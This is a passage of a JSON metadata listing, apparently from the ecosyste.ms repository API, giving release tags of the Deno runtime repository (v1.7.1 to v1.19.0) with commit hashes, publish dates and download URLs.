,"manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0